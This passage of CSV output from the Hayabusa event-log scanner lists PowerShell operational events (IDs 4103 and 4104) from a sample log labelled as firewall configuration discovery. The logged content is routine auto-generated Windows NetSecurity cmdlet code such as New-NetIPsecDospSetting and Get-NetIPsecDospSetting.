ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 